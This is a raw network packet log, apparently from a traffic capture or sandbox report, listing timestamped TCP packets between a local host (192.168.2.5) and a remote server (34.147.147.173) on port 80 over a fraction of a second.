Jan 7, 2025 14:38:16.541239977 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541410923 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541459084 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541471004 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541501045 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541520119 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541548967 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541577101 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541589975 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541593075 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541630030 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541671038 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541706085 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541774988 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541809082 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541821957 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541846991 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541857958 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541867018 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541902065 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541922092 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541938066 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541954994 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541959047 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541976929 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541994095 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.542009115 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.542046070 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.542089939 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.542129040 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.542169094 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.542208910 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.548901081 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548912048 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548919916 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548938990 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548947096 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548954964 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548964977 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548974037 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548976898 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.548981905 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548990011 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.548998117 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549006939 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549006939 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.549015045 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549021959 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549030066 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549037933 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549038887 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.549046040 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549055099 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549062967 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549069881 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549092054 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549099922 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549108028 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549115896 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549124002 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549132109 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549139023 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549146891 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549154997 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549158096 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549165964 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549174070 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549181938 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549189091 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549196959 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549200058 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549207926 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549216032 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549223900 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549232006 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549238920 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549247026 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549253941 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549263954 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.549791098 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.554714918 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554724932 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554733038 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554742098 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554769993 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.554802895 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.554806948 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554819107 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554827929 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554836035 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554843903 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554850101 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.554852009 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554867029 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554876089 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554883003 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554891109 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554898977 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554907084 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554914951 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554923058 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554930925 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554982901 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.554991961 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555037975 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555046082 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555054903 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555063009 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555069923 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555078983 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555087090 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555095911 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555104017 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555123091 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555131912 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555133104 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555131912 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555145025 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555161953 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555179119 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555187941 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555213928 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555222988 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555233002 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555269003 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555272102 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555278063 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555320978 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555560112 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555568933 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555607080 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555727005 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555768013 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.555910110 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.555969000 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.556334019 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556344986 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556353092 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556360960 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556370020 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556381941 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.556415081 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.556473970 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556530952 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.556832075 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.556871891 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.557039022 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557080030 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.557219982 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557257891 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557260036 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.557270050 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557285070 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557293892 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557302952 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557310104 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.557311058 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557320118 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557327032 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557331085 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557337999 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.557337999 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557346106 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557353973 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.557362080 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564513922 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564522982 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564553976 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564563036 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564615011 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564624071 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564687967 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564696074 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564738989 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564748049 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564790964 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564800024 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564824104 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564831972 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564868927 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564877987 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564914942 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564987898 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.564996958 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565004110 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565018892 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565027952 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565063953 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565073013 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565089941 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565099955 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565114975 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565135002 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565144062 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565170050 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565170050 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565171957 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565181017 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565191984 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565208912 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565217972 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565223932 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565227985 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565263987 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565270901 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565274000 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565294981 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565304041 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565311909 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565342903 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565347910 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565356970 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565393925 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565412998 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565422058 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565452099 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565459967 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565459967 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565499067 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.565510988 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565519094 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565584898 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.565593004 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566329002 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566339016 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566353083 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566360950 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566395998 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566402912 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566441059 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566450119 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566510916 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566519976 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566534042 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.566541910 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.570839882 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.570849895 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.570883036 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.570890903 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571016073 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571024895 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571033001 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571042061 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571050882 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571058989 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571067095 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571111917 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571111917 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571151972 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571161032 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571192026 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571196079 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571202040 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571243048 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571243048 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571254015 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571296930 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571520090 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571528912 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571569920 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571587086 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571604967 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571614027 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571643114 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571664095 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571671009 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571680069 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571686983 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571702003 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571710110 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571722031 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571746111 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.571748018 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.571787119 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.572227001 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572237015 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572273970 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572282076 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572287083 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.572323084 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.572324991 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572335005 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572336912 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.572372913 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.572375059 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572385073 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572428942 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572438002 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572448015 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572510958 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572518110 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572525978 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572540045 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572547913 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572601080 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572608948 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572630882 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572638988 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572673082 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572680950 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572724104 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572731972 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572760105 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.572767019 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577038050 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577047110 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577104092 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577112913 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577142954 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577157974 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577197075 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577205896 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577235937 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.577239037 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577249050 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577284098 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.577284098 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.577289104 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577297926 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577325106 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577362061 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577420950 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577428102 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577466011 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577474117 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577512980 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577521086 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577536106 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577569008 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577600956 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577609062 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577657938 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577666998 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577702999 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577711105 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577752113 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577759027 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577805996 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577812910 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577841997 CET	80	49706	34.147.147.173	192.168.2.5
